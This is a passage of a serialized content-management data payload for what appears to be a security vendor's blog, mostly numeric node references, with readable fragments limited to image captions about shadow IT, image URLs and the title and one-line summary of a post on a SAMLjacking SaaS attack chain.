10},{},[294211],{"nodeType":173,"value":287437,"marks":294212,"data":294213},[],{},{"nodeType":169,"data":294215,"content":294216},{},[294217],{"nodeType":173,"value":287444,"marks":294218,"data":294219},[],{},{"nodeType":312,"data":294221,"content":294224},{"target":294222},{"sys":294223},{"id":287451,"type":317,"linkType":318},[],{"nodeType":235,"data":294226,"content":294227},{},[294228],{"nodeType":173,"value":287457,"marks":294229,"data":294230},[],{},{"nodeType":178,"data":294232,"content":294233},{},[294234,294237,294244],{"nodeType":173,"value":287464,"marks":294235,"data":294236},[],{},{"nodeType":186,"data":294238,"content":294239},{"uri":287469},[294240],{"nodeType":173,"value":287472,"marks":294241,"data":294243},[294242],{"type":194},{},{"nodeType":173,"value":287477,"marks":294245,"data":294246},[],{},{"nodeType":178,"data":294248,"content":294249},{},[294250],{"nodeType":173,"value":287484,"marks":294251,"data":294252},[],{},{"nodeType":235,"data":294254,"content":294255},{},[294256],{"nodeType":173,"value":287491,"marks":294257,"data":294258},[],{},{"nodeType":178,"data":294260,"content":294261},{},[294262],{"nodeType":173,"value":287498,"marks":294263,"data":294264},[],{},{"nodeType":178,"data":294266,"content":294267},{},[294268],{"nodeType":173,"value":287505,"marks":294269,"data":294270},[],{},{"nodeType":178,"data":294272,"content":294273},{},[294274],{"nodeType":173,"value":287512,"marks":294275,"data":294276},[],{},{"nodeType":178,"data":294278,"content":294279},{},[294280],{"nodeType":173,"value":287519,"marks":294281,"data":294282},[],{},{"nodeType":235,"data":294284,"content":294285},{},[294286],{"nodeType":173,"value":287526,"marks":294287,"data":294288},[],{},{"nodeType":178,"data":294290,"content":294291},{},[294292],{"nodeType":173,"value":287533,"marks":294293,"data":294294},[],{},{"nodeType":235,"data":294296,"content":294297},{},[294298],{"nodeType":173,"value":287540,"marks":294299,"data":294300},[],{},{"nodeType":178,"data":294302,"content":294303},{},[294304,294307,294311],{"nodeType":173,"value":287547,"marks":294305,"data":294306},[],{},{"nodeType":173,"value":287551,"marks":294308,"data":294310},[294309],{"type":1646},{},{"nodeType":173,"value":287556,"marks":294312,"data":294313},[],{},{"nodeType":178,"data":294315,"content":294316},{},[294317,294320,294324],{"nodeType":173,"value":287563,"marks":294318,"data":294319},[],{},{"nodeType":173,"value":287567,"marks":294321,"data":294323},[294322],{"type":1646},{},{"nodeType":173,"value":287572,"marks":294325,"data":294326},[],{},{"nodeType":178,"data":294328,"content":294329},{},[294330],{"nodeType":173,"value":287579,"marks":294331,"data":294332},[],{},{"nodeType":169,"data":294334,"content":294335},{},[294336],{"nodeType":173,"value":287586,"marks":294337,"data":294338},[],{},{"nodeType":178,"data":294340,"content":294341},{},[294342],{"nodeType":173,"value":287593,"marks":294343,"data":294344},[],{},{"nodeType":178,"data":294346,"content":294347},{},[294348],{"nodeType":173,"value":287600,"marks":294349,"data":294350},[],{},{"nodeType":178,"data":294352,"content":294353},{},[294354],{"nodeType":173,"value":287607,"marks":294355,"data":294356},[],{},{"nodeType":178,"data":294358,"content":294359},{},[294360],{"nodeType":173,"value":287614,"marks":294361,"data":294362},[],{},{"nodeType":235,"data":294364,"content":294365},{},[294366],{"nodeType":173,"value":287621,"marks":294367,"data":294368},[],{},{"nodeType":178,"data":294370,"content":294371},{},[294372],{"nodeType":173,"value":287628,"marks":294373,"data":294374},[],{},{"nodeType":235,"data":294376,"content":294377},{},[294378],{"nodeType":173,"value":287635,"marks":294379,"data":294380},[],{},{"nodeType":178,"data":294382,"content":294383},{},[294384],{"nodeType":173,"value":287642,"marks":294385,"data":294386},[],{},{"nodeType":178,"data":294388,"content":294389},{},[294390],{"nodeType":173,"value":287649,"marks":294391,"data":294392},[],{},{"nodeType":235,"data":294394,"content":294395},{},[294396],{"nodeType":173,"value":287656,"marks":294397,"data":294398},[],{},{"nodeType":178,"data":294400,"content":294401},{},[294402],{"nodeType":173,"value":287663,"marks":294403,"data":294404},[],{},{"nodeType":178,"data":294406,"content":294407},{},[294408],{"nodeType":173,"value":287670,"marks":294409,"data":294410},[],{},{"nodeType":178,"data":294412,"content":294413},{},[294414],{"nodeType":173,"value":287677,"marks":294415,"data":294416},[],{},{"nodeType":178,"data":294418,"content":294419},{},[294420,294423,294430],{"nodeType":173,"value":287684,"marks":294421,"data":294422},[],{},{"nodeType":186,"data":294424,"content":294425},{"uri":287689},[294426],{"nodeType":173,"value":287692,"marks":294427,"data":294429},[294428],{"type":194},{},{"nodeType":173,"value":287697,"marks":294431,"data":294432},[],{},{"entries":294434},{"hyperlink":294435,"inline":294436,"block":294437},[],[],[294438,294445],{"sys":294439,"__typename":5345,"title":294440,"caption":118,"layoutMode":118,"file":294441},{"id":287361},"Risks of Shadow IT",{"url":294442,"width":294443,"height":294444},"https://images.ctfassets.net/y1cdw1ablpvd/3WlIBBrP9U8eDeTAwWfL3L/fbc2e7e0392831aae6ff392ac4b85507/Screenshot_2023-08-30_at_9.24.03_AM.png",1584,888,{"sys":294446,"__typename":5345,"title":294447,"caption":118,"layoutMode":118,"file":294448},{"id":287451},"How to manage shadow IT risk",{"url":294449,"width":288184,"height":254282},"https://images.ctfassets.net/y1cdw1ablpvd/6FSkByMYm70r9KLtBBe4n/20c82e55c1b219ffcd80cb79c265a881/Screenshot_2023-08-30_at_9.23.46_AM.png","content:blog:understanding-shadow-it.json","blog/understanding-shadow-it.json","blog/understanding-shadow-it",{"_path":294454,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":294455,"ogImage":118,"summary":294457,"title":252406,"subtitle":118,"metaTitle":294468,"synopsis":259904,"hashTags":118,"publishedDate":259905,"slug":252407,"tagsCollection":294469,"relatedBlogPostsCollection":294475,"authorsCollection":296305,"content":296309,"_id":296773,"_type":5439,"_source":5440,"_file":296774,"_stem":296775,"_extension":5439},"/blog/samljacking-a-poisoned-tenant",{"id":228244,"publishedAt":294456},"2024-03-21T08:59:19.497Z",{"json":294458},{"data":294459,"content":294460,"nodeType":165},{},[294461],{"data":294462,"content":294463,"nodeType":178},{},[294464],{"data":294465,"marks":294466,"value":294467,"nodeType":173},{},[],"In this article, we’re going to demo combining two of our favorite new SaaS attack techniques to make a simple, but effective attack chain.","SaaS Attack: How to SAMLjack a poisoned tenant",{"items":294470},[294471,294473],{"sys":294472,"name":505},{"id":504},{"sys":294474,"name":509},{"id":508},{"items":294476},[294477,295152,295923],{"__typename":1528,"sys":294478,"content":294479,"title":209117,"synopsis":209118,"hashTags":118,"publishedDate":209119,"slug":209120,"tagsCollection":295142,"authorsCollection":295148},{"id":208338},{"json":294480},{"nodeType":165,"data":294481,"content":294482},{},[294483,294489,294495,294501,294507,294513,294519,294524,294540,294546,294582,294588,294594,294630,294646,294652,294658,294664,294680,294696,294702,294732,294738,294754,294760,294766,294792,294808,294814,294819,294825,294831,294837,294843,294849,294855,294861,294867,294873,294879,294885,294891,294904,294910,294966,294972,294978,295001,295014,295020,295026,295032,295058,295075,295081,295087,295093,295099,295115,295131,295136],{"nodeType":178,"data":294484,"content":294485},{},[294486],{"nodeType":173,"value":208347,"marks":294487,"data":294488},[],{},{"nodeType":178,"data":294490,"content":294491},{},[294492],{"nodeType":173,"value":208354,"marks":294493,"data":294494},[],{},{"nodeType":178,"data":294496,"content":294497},{},[294498],{"nodeType":173,"value":208361,"marks":294499,"data":294500},[],{},{"nodeType":178,"data":294502,"content":294503},{},[294504],{"nodeType":173,"value":208368,"marks":294505,"data":294506},[],{},{"nodeType":169,"data":294508,"content":294509},{},[294510],{"nodeType":173,"value":208375,"marks":294511,"data":294512},[],{},{"nodeType":178,"data":294514,"content":294515},{},[294516],{"nodeType":173,"value":208382,"marks":294517,"data":294518},[],{},{"nodeType":312,"data":294520,"content":294523},{"target":294521},{"sys":294522},{"id":208389,"type":317,"linkType":318},[],{"nodeType":178,"data":294525,"content":294526},{},[294527,294530,294537],{"nodeType":173,"value":208395,"marks":294528,"data":294529},[],{},{"nodeType":186,"data":294531,"content":294532},{"uri":88239},[294533],{"nodeType":173,"value":197982,"marks":294534,"data":294536},[294535],{"type":194},{},{"nodeType":173,"value":1477,"marks":294538,"data":294539},[],{},{"nodeType":178,"data":294541,"content":294542},{},[294543],{"nodeType":173,"value":208412,"marks":294544,"data":294545},[],{},{"nodeType":178,"data":294547,"content":294548},{},[294549,294552,294559,294562,294569,294572,294579],{"nodeType":173,"value":208419,"marks":294550,"data":294551},[],{},{"nodeType":186,"data":294553,"content":294554},{"uri":106815},[294555],{"nodeType":173,"value":208426,"marks":294556,"data":294558},[294557],{"type":194},{},{"nodeType":173,"value":933,"marks":294560,"data":294561},[],{},{"nodeType":186,"data":294563,"content":294564},{"uri":208435},[294565],{"nodeType":173,"value":208438,"marks":294566,"data":294568},[294567],{"type":194},{},{"nodeType":173,"value":208443,"marks":294570,"data":294571},[],{},{"nodeType":186,"data":294573,"content":294574},{"uri":162296},[294575],{"nodeType":173,"value":208450,"marks":294576,"data":294578},[294577],{"type":194},{},{"nodeType":173,"value":208455,"marks":294580,"data":294581},[],{},{"nodeType":178,"data":294583,"content":294584},{},[294585],{"nodeType":173,"value":208462,"marks":294586,"data":294587},[],{},{"nodeType":235,"data":294589,"content":294590},{},[294591],{"nodeType":173,"value":208469,"marks":294592,"data":294593},[],{},{"nodeType":178,"data":294595,"content":294596},{},[294597,294600,294607,294610,294617,294620,294627],{"nodeType":173,"value":208476,"marks":294598,"data":294599},[],{},{"nodeType":186,"data":294601,"content":294602},{"uri":184680},[294603],{"nodeType":173,"value":182807,"marks":294604,"data":294606},[294605],{"type":194},{},{"nodeType":173,"value":933,"marks":294608,"data":294609},[],{},{"nodeType":186,"data":294611,"content":294612},{"uri":197109},[294613],{"nodeType":173,"value":197114,"marks":294614,"data":294616},[294615],{"type":194},{},{"nodeType":173,"value":208497,"marks":294618,"data":294619},[],{},{"nodeType":186,"data":294621,"content":294622},{"uri":197770},[294623],{"nodeType":173,"value":208504,"marks":294624,"data":294626},[294625],{"type":194},{},{"nodeType":173,"value":208509,"marks":294628,"data":294629},[],{},{"nodeType":178,"data":294631,"content":294632},{},[294633,294636,294643],{"nodeType":173,"value":208516,"marks":294634,"data":294635},[],{},{"nodeType":186,"data":294637,"content":294638},{"uri":208521},[294639],{"nodeType":173,"value":208524,"marks":294640,"data":294642},[294641],{"type":194},{},{"nodeType":173,"value":208529,"marks":294644,"data":294645},[],{},{"nodeType":178,"data":294647,"content":294648},{},[294649],{"nodeType":173,"value":208536,"marks":294650,"data":294651},[],{},{"nodeType":178,"data":294653,"content":294654},{},[294655],{"nodeType":173,"value":208543,"marks":294656,"data":294657},[],{},{"nodeType":235,"data":294659,"content":294660},{},[294661],{"nodeType":173,"value":208550,"marks":294662,"data":294663},[],{},{"nodeType":178,"data":294665,"content":294666},{},[294667,294670,294677],{"nodeType":173,"value":208557,"marks":294668,"data":294669},[],{},{"nodeType":186,"data":294671,"content":294672},{"uri":208562},[294673],{"nodeType":173,"value":208565,"marks":294674,"data":294676},[294675],{"type":194},{},{"nodeType":173,"value":208570,"marks":294678,"data":294679},[],{},{"nodeType":178,"data":294681,"content":294682},{},[294683,294686,294693],{"nodeType":173,"value":208577,"marks":294684,"data":294685},[],{},{"nodeType":186,"data":294687,"content":294688},{"uri":144083},[294689],{"nodeType":173,"value":144086,"marks":294690,"data":294692},[294691],{"type":194},{},{"nodeType":173,"value":208588,"marks":294694,"data":294695},[],{},{"nodeType":178,"data":294697,"content":294698},{},[294699],{"nodeType":173,"value":208595,"marks":294700,"data":294701},[],{},{"nodeType":250,"data":294703,"content":294704},{},[294705,294714,294723],{"nodeType":254,"data":294706,"content":294707},{},[294708],{"nodeType":178,"data":294709,"content":294710},{},[294711],{"nodeType":173,"value":208608,"marks":294712,"data":294713},[],{},{"nodeType":254,"data":294715,"content":294716},{},[294717],{"nodeType":178,"data":294718,"content":294719},{},[294720],{"nodeType":173,"value":208618,"marks":294721,"data":294722},[],{},{"nodeType":254,"data":294724,"content":294725},{},[294726],{"nodeType":178,"data":294727,"content":294728},{},[294729],{"nodeType":173,"value":208628,"marks":294730,"data":294731},[],{},{"nodeType":178,"data":294733,"content":294734},{},[294735],{"nodeType":173,"value":208635,"marks":294736,"data":294737},[],{},{"nodeType":178,"data":294739,"content":294740},{},[294741,294744,294751],{"nodeType":173,"value":208642,"marks":294742,"data":294743},[],{},{"nodeType":186,"data":294745,"content":294746},{"uri":59335},[294747],{"nodeType":173,"value":208649,"marks":294748,"data":294750},[294749],{"type":194},{},{"nodeType":173,"value":208654,"marks":294752,"data":294753},[],{},{"nodeType":235,"data":294755,"content":294756},{},[294757],{"nodeType":173,"value":208661,"marks":294758,"data":294759},[],{},{"nodeType":178,"data":294761,"content":294762},{},[294763],{"nodeType":173,"value":208668,"marks":294764,"data":294765},[],{},{"nodeType":178,"data":294767,"content":294768},{},[294769,294772,294779,294782,294789],{"nodeType":173,"value":208675,"marks":294770,"data":294771},[],{},{"nodeType":186,"data":294773,"content":294774},{"uri":208680},[294775],{"nodeType":173,"value":208683,"marks":294776,"data":294778},[294777],{"type":194},{},{"nodeType":173,"value":933,"marks":294780,"data":294781},[],{},{"nodeType":186,"data":294783,"content":294784},{"uri":832},[294785],{"nodeType":173,"value":835,"marks":294786,"data":294788},[294787],{"type":194},{},{"nodeType":173,"value":208698,"marks":294790,"data":294791},[],{},{"nodeType":178,"data":294793,"content":294794},{},[294795,294798,294805],{"nodeType":173,"value":208705,"marks":294796,"data":294797},[],{},{"nodeType":186,"data":294799,"content":294800},{"uri":208710},[294801],{"nodeType":173,"value":208713,"marks":294802,"data":294804},[294803],{"type":194},{},{"nodeType":173,"value":208718,"marks":294806,"data":294807},[],{},{"nodeType":178,"data":294809,"content":294810},{},[294811],{"nodeType":173,"value":208725,"marks":294812,"data":294813},[],{},{"nodeType":312,"data":294815,"content":294818},{"target":294816},{"sys":294817},{"id":169040,"type":317,"linkType":318},[],{"nodeType":169,"data":294820,"content":294821},{},[294822],{"nodeType":173,"value":208737,"marks":294823,"data":294824},[],{},{"nodeType":178,"data":294826,"content":294827},{},[294828],{"nodeType":173,"value":208744,"marks":294829,"data":294830},[],{},{"nodeType":178,"data":294832,"content":294833},{},[294834],{"nodeType":173,"value":208751,"marks":294835,"data":294836},[],{},{"nodeType":235,"data":294838,"content":294839},{},[294840],{"nodeType":173,"value":208758,"marks":294841,"data":294842},[],{},{"nodeType":178,"data":294844,"content":294845},{},[294846],{"nodeType":173,"value":208765,"marks":294847,"data":294848},[],{},{"nodeType":178,"data":294850,"content":294851},{},[294852],{"nodeType":173,"value":208772,"marks":294853,"data":294854},[],{},{"nodeType":178,"data":294856,"content":294857},{},[294858],{"nodeType":173,"value":208779,"marks":294859,"data":294860},[],{},{"nodeType":235,"data":294862,"content":294863},{},[294864],{"nodeType":173,"value":208786,"marks":294865,"data":294866},[],{},{"nodeType":178,"data":294868,"content":294869},{},[294870],{"nodeType":173,"value":208793,"marks":294871,"data":294872},[],{},{"nodeType":178,"data":294874,"content":294875},{},[294876],{"nodeType":173,"value":208800,"marks":294877,"data":294878},[],{},{"nodeType":178,"data":294880,"content":294881},{},[294882],{"nodeType":173,"value":208807,"marks":294883,"data":294884},[],{},{"nodeType":169,"data":294886,"content":294887},{},[294888],{"nodeType":173,"value":208814,"marks":294889,"data":294890},[],{},{"nodeType":178,"data":294892,"content":294893},{},[294894,294897,294901],{"nodeType":173,"value":208821,"marks":294895,"data":294896},[],{},{"nodeType":173,"value":208825,"marks":294898,"data":294900},[294899],{"type":1646},{},{"nodeType":173,"value":208830,"marks":294902,"data":294903},[],{},{"nodeType":235,"data":294905,"content":294906},{},[294907],{"nodeType":173,"value":208837,"marks":294908,"data":294909},[],{},{"nodeType":178,"data":294911,"content":294912},{},[294913,294916,294923,294926,294933,294936,294943,294946,294953,294956,294963],{"nodeType":173,"value":208844,"marks":294914,"data":294915},[],{},{"nodeType":186,"data":294917,"content":294918},{"uri":208849},[294919],{"nodeType":173,"value":208852,"marks":294920,"data":294922},[294921],{"type":194},{},{"nodeType":173,"value":933,"marks":294924,"data":294925},[],{},{"nodeType":186,"data":294927,"content":294928},{"uri":208861},[294929],{"nodeType":173,"value":208864,"marks":294930,"data":294932},[294931],{"type":194},{},{"nodeType":173,"value":208869,"marks":294934,"data":294935},[],{},{"nodeType":186,"data":294937,"content":294938},{"uri":208874},[294939],{"nodeType":173,"value":208877,"marks":294940,"data":294942},[294941],{"type":194},{},{"nodeType":173,"value":73790,"marks":294944,"data":294945},[],{},{"nodeType":186,"data":294947,"content":294948},{"uri":1297},[294949],{"nodeType":173,"value":208888,"marks":294950,"data":294952},[294951],{"type":194},{},{"nodeType":173,"value":208893,"marks":294954,"data":294955},[],{},{"nodeType":186,"data":294957,"content":294958},{"uri":208898},[294959],{"nodeType":173,"value":208901,"marks":294960,"data":294962},[294961],{"type":194},{},{"nodeType":173,"value":208906,"marks":294964,"data":294965},[],{},{"nodeType":178,"data":294967,"content":294968},{},[294969],{"nodeType":173,"value":208913,"marks":294970,"data":294971},[],{},{"nodeType":235,"data":294973,"content":294974},{},[294975],{"nodeType":173,"value":208920,"marks":294976,"data":294977},[],{},{"nodeType":178,"data":294979,"content":294980},{},[294981,294984,294988,294991,294998],{"nodeType":173,"value":208927,"marks":294982,"data":294983},[],{},{"nodeType":173,"value":208931,"marks":294985,"data":294987},[294986],{"type":194},{},{"nodeType":173,"value":208936,"marks":294989,"data":294990},[],{},{"nodeType":186,"data":294992,"content":294993},{"uri":208941},[294994],{"nodeType":173,"value":208944,"marks":294995,"data":294997},[294996],{"type":194},{},{"nodeType":173,"value":208949,"marks":294999,"data":295000},[],{},{"nodeType":178,"data":295002,"content":295003},{},[295004,295007,295011],{"nodeType":173,"value":208956,"marks":295005,"data":295006},[],{},{"nodeType":173,"value":208960,"marks":295008,"data":295010},[295009],{"type":1646},{},{"nodeType":173,"value":1477,"marks":295012,"data":295013},[],{},{"nodeType":178,"data":295015,"content":295016},{},[295017],{"nodeType":173,"value":208971,"marks":295018,"data":295019},[],{},{"nodeType":235,"data":295021,"content":295022},{},[295023],{"nodeType":173,"value":208978,"marks":295024,"data":295025},[],{},{"nodeType":178,"data":295027,"content":295028},{},[295029],{"nodeType":173,"value":208985,"marks":295030,"data":295031},[],{},{"nodeType":178,"data":295033,"content":295034},{},[295035,295038,295045,295048,295055],{"nodeType":173,"value":208992,"marks":295036,"data":295037},[],{},{"nodeType":186,"data":295039,"content":295040},{"uri":208997},[295041],{"nodeType":173,"value":209000,"marks":295042,"data":295044},[295043],{"type":194},{},{"nodeType":173,"value":209005,"marks":295046,"data":295047},[],{},{"nodeType":186,"data":295049,"content":295050},{"uri":209010},[295051],{"nodeType":173,"value":209013,"marks":295052,"data":295054},[295053],{"type":194},{},{"nodeType":173,"value":209018,"marks":295056,"data":295057},[],{},{"nodeType":178,"data":295059,"content":295060},{},[295061,295064,295072],{"nodeType":173,"value":209025,"marks":295062,"data":295063},[],{},{"nodeType":186,"data":295065,"content":295066},{"uri":209030},[295067],{"nodeType":173,"value":209033,"marks":295068,"data":295071},[295069,295070],{"type":194},{"type":1646},{},{"nodeType":173,"value":37,"marks":295073,"data":295074},[],{},{"nodeType":178,"data":295076,"content":295077},{},[295078],{"nodeType":173,"value":209045,"marks":295079,"data":295080},[],{},{"nodeType":169,"data":295082,"content":295083},{},[295084],{"nodeType":173,"value":209052,"marks":295085,"data":295086},[],{},{"nodeType":178,"data":295088,"content":295089},{},[295090],{"nodeType":173,"value":209059,"marks":295091,"data":295092},[],{},{"nodeType":178,"data":295094,"content":295095},{},[295096],{"nodeType":173,"value":209066,"marks":295097,"data":295098},[],{},{"nodeType":178,"data":295100,"content":295101},{},[295102,295105,295112],{"nodeType":173,"value":209073,"marks":295103,"data":295104},[],{},{"nodeType":186,"data":295106,"content":295107},{"uri":209078},[295108],{"nodeType":173,"value":209081,"marks":295109,"data":295111},[295110],{"type":194},{},{"nodeType":173,"value":1477,"marks":295113,"data":295114},[],{},{"nodeType":178,"data":295116,"content":295117},{},[295118,295121,295128],{"nodeType":173,"value":209092,"marks":295119,"data":295120},[],{},{"nodeType":186,"data":295122,"content":295123},{"uri":88239},[295124],{"nodeType":173,"value":197982,"marks":295125,"data":295127},[295126],{"type":194},{},{"nodeType":173,"value":197986,"marks":295129,"data":295130},[],{},{"nodeType":312,"data":295132,"content":295135},{"target":295133},{"sys":295134},{"id":209109,"type":317,"linkType":318},[],{"nodeType":178,"data":295137,"content":295138},{},[295139],{"nodeType":173,"value":37,"marks":295140,"data":295141},[],{},{"items":295143},[295144,295146],{"sys":295145,"name":505},{"id":504},{"sys":295147,"name":509},{"id":508},{"items":295149},[295150],{"fullName":13977,"firstName":13978,"jobTitle":13979,"profilePicture":295151},{"url":13981},{"__typename":1528,"sys":295153,"content":295154,"title":268752,"synopsis":267888,"hashTags":118,"publishedDate":268753,"slug":268754,"tagsCollection":295913,"authorsCollection":295919},{"id":267879},{"json":295155},{"nodeType":165,"data":295156,"content":295157},{},[295158,295164,295170,295198,295204,295210,295226,295232,295238,295244,295268,295274,295280,295293,295299,295305,295335,295341,295347,295353,295359,295365,295370,295376,295382,295388,295395,295401,295417,295423,295429,295435,295441,295447,295453,295459,295465,295471,295476,295482,295498,295504,295520,295525,295530,295535,295541,295547,295553,295558,295563,295569,295575,295581,295587,295593,295598,295614,295630,295636,295641,295646,295652,295658,295664,295670,295691,295696,295701,295707,295713,295719,295729,295734,295740,295745,295750,295756,295762,295768,295773,295778,295784,295790,295895,295901,295907],{"nodeType":178,"data":295159,"content":295160},{},[295161],{"nodeType":173,"value":267888,"marks":295162,"data":295163},[],{},{"nodeType":178,"data":295165,"content":295166},{},[295167],{"nodeType":173,"value":267895,"marks":295168,"data":295169},[],{},{"nodeType":178,"data":295171,"content":295172},{},[295173,295176,295183,295186,295195],{"nodeType":173,"value":267902,"marks":295174,"data":295175},[],{},{"nodeType":186,"data":295177,"content":295178},{"uri":88239},[295179],{"nodeType":173,"value":88742,"marks":295180,"data":295182},[295181],{"type":194},{},{"nodeType":173,"value":267913,"marks":295184,"data":295185},[],{},{"nodeType":1698,"data":295187,"content":295190},{"target":295188},{"sys":295189},{"id":228244,"type":317,"linkType":318},[295191],{"nodeType":173,"value":252406,"marks":295192,"data":295194},[295193],{"type":194},{},{"nodeType":173,"value":197,"marks":295196,"data":295197},[],{},{"nodeType":178,"data":295199,"content":295200},{},[295201],{"nodeType":173,"value":267932,"marks":295202,"data":295203},[],{},{"nodeType":169,"data":295205,"content":295206},{},[295207],{"nodeType":173,"value":267939,"marks":295208,"data":295209},[],{},{"nodeType":178,"data":295211,"content":295212},{},[295213,295216,295223],{"nodeType":173,"value":15816,"marks":295214,"data":295215},[],{},{"nodeType":186,"data":295217,"content":295218},{"uri":144083},[295219],{"nodeType":173,"value":267952,"marks":295220,"data":295222},[295221],{"type":194},{},{"nodeType":173,"value":267957,"marks":295224,"data":295225},[],{},{"nodeType":178,"data":295227,"content":295228},{},[295229],{"nodeType":173,"value":267964,"marks":295230,"data":295231},[],{},{"nodeType":169,"data":295233,"content":295234},{},[295235],{"nodeType":173,"value":267971,"marks":295236,"data":295237},[],{},{"nodeType":178,"data":295239,"content":295240},{},[295241],{"nodeType":173,"value":267978,"marks":295242,"data":295243},[],{},{"nodeType":178,"data":295245,"content":295246},{},[295247,295250,295257,295260,295265],{"nodeType":173,"value":96646,"marks":295248,"data":295249},[],{},{"nodeType":186,"data":295251,"content":295252},{"uri":59335},[295253],{"nodeType":173,"value":208649,"marks":295254,"data":295256},[295255],{"type":194},{},{"nodeType":173,"value":267995,"marks":295258,"data":295259},[],{},{"nodeType":173,"value":267999,"marks":295261,"data":295264},[295262,295263],{"type":1646},{"type":370},{},{"nodeType":173,"value":268005,"marks":295266,"data":295267},[],{},{"nodeType":169,"data":295269,"content":295270},{},[295271],{"nodeType":173,"value":259540,"marks":295272,"data":295273},[],{},{"nodeType":178,"data":295275,"content":295276},{},[295277],{"nodeType":173,"value":268018,"marks":295278,"data":295279},[],{},{"nodeType":178,"data":295281,"content":295282},{},[295283,295286,295290],{"nodeType":173,"value":268025,"marks":295284,"data":295285},[],{},{"nodeType":173,"value":268029,"marks":295287,"data":295289},[295288],{"type":194},{},{"nodeType":173,"value":268034,"marks":295291,"data":295292},[],{},{"nodeType":178,"data":295294,"content":295295},{},[295296],{"nodeType":173,"value":268041,"marks":295297,"data":295298},[],{},{"nodeType":178,"data":295300,"content":295301},{},[295302],{"nodeType":173,"value":268048,"marks":295303,"data":295304},[],{},{"nodeType":246189,"data":295306,"content":295307},{},[295308,295317,295326],{"nodeType":254,"data":295309,"content":295310},{},[295311],{"nodeType":178,"data":295312,"content":295313},{},[295314],{"nodeType":173,"value":268061,"marks":295315,"data":295316},[],{},{"nodeType":254,"data":295318,"content":295319},{},[295320],{"nodeType":178,"data":295321,"content":295322},{},[295323],{"nodeType":173,"value":268071,"marks":295324,"data":295325},[],{},{"nodeType":254,"data":295327,"content":295328},{},[295329],{"nodeType":178,"data":295330,"content":295331},{},[295332],{"nodeType":173,"value":268081,"marks":295333,"data":295334},[],{},{"nodeType":235,"data":295336,"content":295337},{},[295338],{"nodeType":173,"value":268088,"marks":295339,"data":295340},[],{},{"nodeType":178,"data":295342,"content":295343},{},[295344],{"nodeType":173,"value":268095,"marks":295345,"data":295346},[],{},{"nodeType":178,"data":295348,"content":295349},{},[295350],{"nodeType":173,"value":268102,"marks":295351,"data":295352},[],{},{"nodeType":178,"data":295354,"content":295355},{},[295356],{"nodeType":173,"value":268109,"marks":295357,"data":295358},[],{},{"nodeType":178,"data":295360,"content":295361},{},[295362],{"nodeType":173,"value":268116,"marks":295363,"data":295364},[],{},{"nodeType":312,"data":295366,"content":295369},{"target":295367},{"sys":295368},{"id":268123,"type":317,"linkType":318},[],{"nodeType":235,"data":295371,"content":295372},{},[295373],{"nodeType":173,"value":268129,"marks":295374,"data":295375},[],{},{"nodeType":178,"data":295377,"content":295378},{},[295379],{"nodeType":173,"value":268136,"marks":295380,"data":295381},[],{},{"nodeType":178,"data":295383,"content":295384},{},[295385],{"nodeType":173,"value":268143,"marks":295386,"data":295387},[],{},{"nodeType":178,"data":295389,"content":295390},{},[295391],{"nodeType":173,"value":268150,"marks":295392,"data":295394},[295393],{"type":370},{},{"nodeType":235,"data":295396,"content":295397},{},[295398],{"nodeType":173,"value":268158,"marks":295399,"data":295400},[],{},{"nodeType":178,"data":295402,"content":295403},{},[295404,295407,295414],{"nodeType":173,"value":268165,"marks":295405,"data":295406},[],{},{"nodeType":186,"data":295408,"content":295409},{"uri":268170},[295410],{"nodeType":173,"value":268173,"marks":295411,"data":295413},[295412],{"type":194},{},{"nodeType":173,"value":268178,"marks":295415,"data":295416},[],{},{"nodeType":178,"data":295418,"content":295419},{},[295420],{"nodeType":173,"value":268185,"marks":295421,"data":295422},[],{},{"nodeType":178,"data":295424,"content":295425},{},[295426],{"nodeType":173,"value":268192,"marks":295427,"data":295428},[],{},{"nodeType":169,"data":295430,"content":295431},{},[295432],{"nodeType":173,"value":268199,"marks":295433,"data":295434},[],{},{"nodeType":178,"data":295436,"content":295437},{},[295438],{"nodeType":173,"value":268206,"marks":295439,"data":295440},[],{},{"nodeType":178,"data":295442,"content":295443},{},[295444],{"nodeType":173,"value":268213,"marks":295445,"data":295446},[],{},{"nodeType":178,"data":295448,"content":295449},{},[295450],{"nodeType":173,"value":268220,"marks":295451,"data":295452},[],{},{"nodeType":178,"data":295454,"content":295455},{},[295456],{"nodeType":173,"value":268227,"marks":295457,"data":295458},[],{},{"nodeType":178,"data":295460,"content":295461},{},[295462],{"nodeType":173,"value":268234,"marks":295463,"data":295464},[],{},{"nodeType":178,"data":295466,"content":295467},{},[295468],{"nodeType":173,"value":268241,"marks":295469,"data":295470},[],{},{"nodeType":312,"data":295472,"content":295475},{"target":295473},{"sys":295474},{"id":268248,"type":317,"linkType":318},[],{"nodeType":169,"data":295477,"content":295478},{},[295479],{"nodeType":173,"value":268254,"marks":295480,"data":295481},[],{},{"nodeType":178,"data":295483,"content":295484},{},[295485,295488,295495],{"nodeType":173,"value":268261,"marks":295486,"data":295487},[],{},{"nodeType":186,"data":295489,"content":295490},{"uri":197841},[295491],{"nodeType":173,"value":268268,"marks":295492,"data":295494},[295493],{"type":194},{},{"nodeType":173,"value":268273,"marks":295496,"data":295497},[],{},{"nodeType":235,"data":295499,"content":295500},{},[295501],{"nodeType":173,"value":268280,"marks":295502,"data":295503},[],{},{"nodeType":178,"data":295505,"content":295506},{},[295507,295510,295517],{"nodeType":173,"value":268287,"marks":295508,"data":295509},[],{},{"nodeType":186,"data":295511,"content":295512},{"uri":268292},[295513],{"nodeType":173,"value":268292,"marks":295514,"data":295516},[295515],{"type":194},{},{"nodeType":173,"value":268299,"marks":295518,"data":295519},[],{},{"nodeType":312,"data":295521,"content":295524},{"target":295522},{"sys":295523},{"id":268306,"type":317,"linkType":318},[],{"nodeType":312,"data":295526,"content":295529},{"target":295527},{"sys":295528},{"id":268312,"type":317,"linkType":318},[],{"nodeType":312,"data":295531,"content":295534},{"target":295532},{"sys":295533},{"id":268318,"type":317,"linkType":318},[],{"nodeType":235,"data":295536,"content":295537},{},[295538],{"nodeType":173,"value":268324,"marks":295539,"data":295540},[],{},{"nodeType":178,"data":295542,"content":295543},{},[295544],{"nodeType":173,"value":268331,"marks":295545,"data":295546},[],{},{"nodeType":178,"data":295548,"content":295549},{},[295550],{"nodeType":173,"value":268338,"marks":295551,"data":295552},[],{},{"nodeType":312,"data":295554,"content":295557},{"target":295555},{"sys":295556},{"id":268345,"type":317,"linkType":318},[],{"nodeType":312,"data":295559,"content":295562},{"target":295560},{"sys":295561},{"id":268351,"type":317,"linkType":318},[],{"nodeType":169,"data":295564,"content":295565},{},[295566],{"nodeType":